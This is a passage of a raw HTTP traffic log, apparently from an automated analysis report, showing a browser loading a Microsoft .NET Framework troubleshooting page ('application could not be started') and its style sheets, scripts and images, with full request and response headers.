sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=46ff90d79af9c81ac17c3dd6864fed4541e4aefa9dadde54d054f9f68affb669
cookie: ARRAffinitySameSite=46ff90d79af9c81ac17c3dd6864fed4541e4aefa9dadde54d054f9f68affb669
ResponseHTTP/2.0 200
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Dynamic
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0V2KqYwAAAACPXZSj87KRTr6ovrThafvTQU1TMDRFREdFMTkxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-type: text/html
content-encoding: gzip
vary: Accept-Encoding
content-length: 11078
cache-control: public, max-age=600
expires: Sat, 31 Dec 2022 00:15:36 GMT
date: Sat, 31 Dec 2022 00:05:36 GMT
akamai-cache-status: RefreshHit from child, RefreshHit from parent
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0msedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 HTTP/2.0
host: learn.microsoft.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
if-none-match: "8HbLinmfUCalpFY5kd8ehkcr/yCyF0uEfrGPXj82TLg="
ResponseHTTP/2.0 304
etag: "8HbLinmfUCalpFY5kd8ehkcr/yCyF0uEfrGPXj82TLg="
cache-control: public, max-age=599
expires: Sat, 31 Dec 2022 00:15:36 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/styles/aeed2be4.site-ltr.cssmsedge.exeRemote address:104.73.152.149:443RequestGET /_themes/docs.theme/master/en-us/_themes/styles/aeed2be4.site-ltr.css HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: text/css
content-encoding: gzip
last-modified: Wed, 14 Dec 2022 03:12:07 GMT
etag: "0x8DADD80FBD6D354"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0+0SeYwAAAAAQiPxODT7GSIVMiLaF/HycQU1TMDRFREdFMTkwNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=444379
expires: Thu, 05 Jan 2023 03:31:56 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.jsmsedge.exeRemote address:104.73.152.149:443RequestGET /_themes/docs.theme/master/en-us/_themes/global/67a45209.deprecation.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: application/javascript
content-encoding: gzip
last-modified: Wed, 14 Dec 2022 03:12:07 GMT
etag: "0x8DADD80FBC14644"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0OT+ZYwAAAABarD5eQGEWQbwtBLhO+whuQU1TMDRFREdFMTgwNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=598956
expires: Fri, 06 Jan 2023 22:28:13 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/_themes/docs.theme/master/en-us/_themes/scripts/4b524b8e.index-docs.jsmsedge.exeRemote address:104.73.152.149:443RequestGET /_themes/docs.theme/master/en-us/_themes/scripts/4b524b8e.index-docs.js HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: application/javascript
content-encoding: gzip
last-modified: Wed, 14 Dec 2022 03:12:07 GMT
etag: "0x8DADD80FB91ADE4"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0qaSfYwAAAACmclXd3y8QQZTxpRUWQMJQQU1TMDRFREdFMTgwNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=568413
expires: Fri, 06 Jan 2023 13:59:10 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/static/third-party/MathJax/2.7.2/MathJax.js?config=TeX-AMS_CHTMLmsedge.exeRemote address:104.73.152.149:443RequestGET /static/third-party/MathJax/2.7.2/MathJax.js?config=TeX-AMS_CHTML HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://learn.microsoft.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-encoding: gzip
content-md5: ejc3qC6nkhfr4g+Ja862Iw==
last-modified: Tue, 08 Nov 2022 17:00:30 GMT
etag: 0x8DAC1AABE3018E9
x-ms-request-id: de8a7602-601e-0057-7ec7-f321b4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}{"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=static"}]}{"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0luZqYwAAAABTWCRcxikxSJNycP5lMxLwQU1TMDRFREdFMTkyMQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
content-length: 19088
vary: Accept-Encoding
cache-control: max-age=27041108
expires: Wed, 08 Nov 2023 23:30:45 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:31 GMT
etag: "0x8D8E3CB30F4C3E2"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0RhAlYwAAAACk92MBVbEZS6mNVdw8ag5XQlJVMzBFREdFMDcxNQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1783
expires: Sat, 31 Dec 2022 00:35:20 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:40 GMT
etag: "0x8D8E3CB365AA10A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0rgwzYwAAAABNSvD02Ow9T7Iq7ySNIpgJTE9OMjEyMDUwNzE3MDUxADcxNjg5MjBlLTlmNWItNGE2Mi1iMTZlLWQ1YmU2M2NlNjFlNw==
cache-control: public, max-age=1799
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:35 GMT
etag: "0x8D8E3CB33C8B874"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0RhAlYwAAAAAtGoHMM3glR5Llovv1uOUQQlJVMzBFREdFMDcxNwA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1794
expires: Sat, 31 Dec 2022 00:35:31 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:36 GMT
etag: "0x8D8E3CB3429357A"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0RhAlYwAAAABjqzeqq98QT5PxLMdgdM7WQlJVMzBFREdFMDQwOQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1752
expires: Sat, 31 Dec 2022 00:34:49 GMT
date: Sat, 31 Dec 2022 00:05:37 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/content-nav/MSDocsHeader-DotNet.json? HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: image/png
last-modified: Wed, 10 Mar 2021 13:48:26 GMT
etag: "0x8D8E3CB2E2E71C7"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0RhAlYwAAAABtYhtBUV/bSYjgmWCjeLTmQlJVMzBFREdFMDcxNgA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
cache-control: public, max-age=1798
expires: Sat, 31 Dec 2022 00:35:36 GMT
date: Sat, 31 Dec 2022 00:05:38 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: application/json
content-encoding: gzip
last-modified: Fri, 23 Dec 2022 02:31:29 GMT
etag: "0x8DAE48DCC103B02"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0vcitYwAAAAAi649MkPU7TZ6SmjkidUVHQU1TMDRFREdFMTgxNQA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=96
expires: Sat, 31 Dec 2022 00:07:14 GMT
date: Sat, 31 Dec 2022 00:05:38 GMT
akamai-cache-status: Hit from child
-
Remote address:104.73.152.149:443RequestGET /en-us/dotnet/breadcrumb/toc.json HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: application/json
content-encoding: gzip
last-modified: Mon, 12 Dec 2022 14:23:09 GMT
etag: "0x8DADC4C64D82904"
request-context: appId=cid-v1:b1c5b6ea-7ff0-41d3-9862-84c5e1dc3be7
x-datacenter: wus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 0vrqYYwAAAACJjKOLajGpQbmTnCpqqVR8QU1TMDRFREdFMTgxNAA3MTY4OTIwZS05ZjViLTRhNjItYjE2ZS1kNWJlNjNjZTYxZTc=
vary: Accept-Encoding
cache-control: public, max-age=452
expires: Sat, 31 Dec 2022 00:13:10 GMT
date: Sat, 31 Dec 2022 00:05:38 GMT
akamai-cache-status: RefreshHit from child
-
GEThttps://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.pngmsedge.exeRemote address:104.73.152.149:443RequestGET /en-us/dotnet/framework/install/media/application-not-started/install-3-5.png HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=nbveek.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: ARRAffinity=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
cookie: ARRAffinitySameSite=224790e11ccad0c1475003f020197e715956166454c09d097e709fb76fdb8a84
ResponseHTTP/2.0 200
content-type: application/json
content-encoding: gzip
last-modified: Thu, 03 Nov 2022 17:50:35 GMT
etag: "0x8DABDC3E90AE3AD"
request-context: appId=cid-v1:8f3babe3-1612-4642-87ca-e9e867ad0935
x-datacenter: eus
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
x-ua-compatible: IE=edge
x-xss-protection: 1; mode=block
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-rendering-stack: Static
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://mdec.nelreports.net/api/report?cat=mdocs"}]}
x-azure-ref: 07YNlYwAAAAAtHE8w5j86QqULxucbzCz0TE9OMjEyMDUwNzE2MDQ1ADcxNjg5MjBlLTlmNWItNGE2Mi1iMTZlLWQ1YmU2M2NlNjFlNw==
vary: Accept-Encoding
cache-control: public, max-age=600
expires: Sat, 31 Dec 2022 00:15:38 GMT
date: Sat, 31 Dec 2022 00:05:38 GMT
set-cookie: ARRAffinity=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673;Path=/;HttpOnly;Secure;Domain=learn.microsoft.com
set-cookie: ARRAffinitySameSite=1700da25a6873ae97a8964a441502a1f0f949bcaec40e7bbfb41d8f8bdfc2673;Path=/;HttpOnly;SameSite=None;Secure;Domain=learn.microsoft.com
akamai-cache-status: RefreshHit from child, Hit from parent
-
GEThttps://learn.microsoft.com/static/third-party/MathJax/2.7.2/config/TeX-AMS_CHTML.js?V=2.7.2msedge.exeRemote address:104.73.152.149:443RequestGET /static/third-party/MathJax/2.7.2/config/TeX-AMS_CHTML.js?V=2.7.2 HTTP/2.0
host: learn.microsoft.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
